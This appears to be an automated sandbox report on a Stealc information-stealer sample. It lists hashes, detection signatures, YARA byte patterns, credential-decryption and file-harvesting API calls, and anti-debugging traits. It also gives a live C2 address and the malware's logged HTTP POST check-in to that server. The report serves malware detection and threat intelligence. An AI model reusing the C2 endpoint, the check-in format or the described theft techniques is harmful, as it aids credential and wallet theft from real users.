Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
gMkw55jZRs.exe

Overview

General Information

Sample name:gMkw55jZRs.exe
renamed because original name is a hash value
Original sample name:cde961132c60bec82f2fd8340bf376b3.exe
Analysis ID:1528657
MD5:cde961132c60bec82f2fd8340bf376b3
SHA1:d5fd613509f43cf4b95de8ce6e7b5ec48b839c7f
SHA256:f1cd9e91a933bb402f4103c1af878495bcbce2640ee3d13d1f7ee37e2f79bcd3
Tags:exeStealcuser-abuse_ch
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for sample
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • gMkw55jZRs.exe (PID: 6876 cmdline: "C:\Users\user\Desktop\gMkw55jZRs.exe" MD5: CDE961132C60BEC82F2FD8340BF376B3)
    • WerFault.exe (PID: 3236 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6876 -s 804 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 2080 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6876 -s 824 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 2896 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6876 -s 856 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 4108 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6876 -s 864 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 6416 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6876 -s 980 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 5956 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6876 -s 1124 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 1856 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6876 -s 1060 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://62.122.184.144/f88d87a7e087e100.php", "Botnet": "default5_pal"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1904673836.00000000009AA000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x11b0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000000.00000002.1904696174.00000000009D4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.1688352446.0000000002330000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            0.3.gMkw55jZRs.exe.2330000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
              0.3.gMkw55jZRs.exe.2330000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                0.2.gMkw55jZRs.exe.910e67.3.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  0.2.gMkw55jZRs.exe.400000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    0.2.gMkw55jZRs.exe.910e67.3.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                      Click to see the 1 entries
                      No Sigma rule has matched
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-08T08:13:05.733660+020020442431Malware Command and Control Activity Detected192.168.2.44973262.122.184.14480TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 00000000.00000003.1688352446.0000000002330000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://62.122.184.144/f88d87a7e087e100.php", "Botnet": "default5_pal"}
                      Source: http://62.122.184.144/Virustotal: Detection: 12%Perma Link
                      Source: http://62.122.184.144Virustotal: Detection: 12%Perma Link
                      Source: http://62.122.184.144/f88d87a7e087e100.phpVirustotal: Detection: 13%Perma Link
                      Source: gMkw55jZRs.exeVirustotal: Detection: 40%Perma Link
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                      Source: gMkw55jZRs.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,0_2_0040C820
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00407240
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00409AC0
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00418EA0
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_00409B60
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_009174A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_009174A7
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00919DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_00919DC7
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00929107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00929107
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00919D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00919D27
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0091CA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,0_2_0091CA87

                      Compliance

                      barindex
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeUnpacked PE file: 0.2.gMkw55jZRs.exe.400000.0.unpack
                      Source: gMkw55jZRs.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0091C0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0091C0D7
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0091DCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0091DCE7
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0091E077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0091E077
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0091F917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0091F917
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00924107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00924107
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00911937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00911937
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0091E697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0091E697
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0091EF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0091EF87
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_009247D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_009247D7
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00923B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00923B17
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00924B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00924B77

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49732 -> 62.122.184.144:80
                      Source: Malware configuration extractorURLs: http://62.122.184.144/f88d87a7e087e100.php
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.122.184.144Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /f88d87a7e087e100.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKFCBFHJDHJKECAKEHIDHost: 62.122.184.144Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 33 41 37 35 36 30 37 42 31 46 43 33 30 37 31 38 35 39 34 36 30 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 35 5f 70 61 6c 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 44 2d 2d 0d 0a Data Ascii: ------AKFCBFHJDHJKECAKEHIDContent-Disposition: form-data; name="hwid"A3A75607B1FC3071859460------AKFCBFHJDHJKECAKEHIDContent-Disposition: form-data; name="build"default5_pal------AKFCBFHJDHJKECAKEHID--
                      Source: Joe Sandbox ViewASN Name: GORSET-ASRU GORSET-ASRU
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00404880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00404880
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.122.184.144Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTP traffic detected: POST /f88d87a7e087e100.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKFCBFHJDHJKECAKEHIDHost: 62.122.184.144Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 33 41 37 35 36 30 37 42 31 46 43 33 30 37 31 38 35 39 34 36 30 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 35 5f 70 61 6c 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 44 2d 2d 0d 0a Data Ascii: ------AKFCBFHJDHJKECAKEHIDContent-Disposition: form-data; name="hwid"A3A75607B1FC3071859460------AKFCBFHJDHJKECAKEHIDContent-Disposition: form-data; name="build"default5_pal------AKFCBFHJDHJKECAKEHID--
                      Source: gMkw55jZRs.exe, 00000000.00000002.1904627382.000000000099E000.00000004.00000020.00020000.00000000.sdmp, gMkw55jZRs.exe, 00000000.00000002.1904696174.00000000009D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144
                      Source: gMkw55jZRs.exe, 00000000.00000002.1904696174.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, gMkw55jZRs.exe, 00000000.00000002.1904696174.00000000009D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144/
                      Source: gMkw55jZRs.exe, 00000000.00000002.1904696174.0000000000A0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144/S
                      Source: gMkw55jZRs.exe, 00000000.00000002.1904696174.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, gMkw55jZRs.exe, 00000000.00000002.1904696174.0000000000A30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144/f88d87a7e087e100.php
                      Source: gMkw55jZRs.exe, 00000000.00000002.1904696174.0000000000A0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144/f88d87a7e087e100.php/
                      Source: gMkw55jZRs.exe, 00000000.00000002.1904696174.0000000000A0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144/f88d87a7e087e100.php9
                      Source: gMkw55jZRs.exe, 00000000.00000002.1904696174.0000000000A30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144/f88d87a7e087e100.phpF
                      Source: gMkw55jZRs.exe, 00000000.00000002.1904696174.0000000000A30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144/f88d87a7e087e100.phpb
                      Source: gMkw55jZRs.exe, 00000000.00000002.1904696174.0000000000A30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144/f88d87a7e087e100.phpn
                      Source: gMkw55jZRs.exe, 00000000.00000002.1904627382.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144F
                      Source: Amcache.hve.3.drString found in binary or memory: http://upx.sf.net

                      System Summary

                      barindex
                      Source: 00000000.00000002.1904673836.00000000009AA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: String function: 004045C0 appears 317 times
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6876 -s 804
                      Source: gMkw55jZRs.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 00000000.00000002.1904673836.00000000009AA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: gMkw55jZRs.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@8/29@0/1
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00413720
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\11VF417B.htmJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6876
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\8c8264a1-cf28-4d66-9444-89cc8dad9f44Jump to behavior
                      Source: gMkw55jZRs.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: gMkw55jZRs.exeVirustotal: Detection: 40%
                      Source: unknownProcess created: C:\Users\user\Desktop\gMkw55jZRs.exe "C:\Users\user\Desktop\gMkw55jZRs.exe"
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6876 -s 804
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6876 -s 824
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6876 -s 856
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6876 -s 864
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6876 -s 980
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6876 -s 1124
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6876 -s 1060
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeSection loaded: wuliwiyixenotafube.dllJump to behavior
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeSection loaded: msvcr100.dllJump to behavior
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                      Data Obfuscation

                      barindex
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeUnpacked PE file: 0.2.gMkw55jZRs.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.luvi:W;.tls:W;.hoz:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeUnpacked PE file: 0.2.gMkw55jZRs.exe.400000.0.unpack
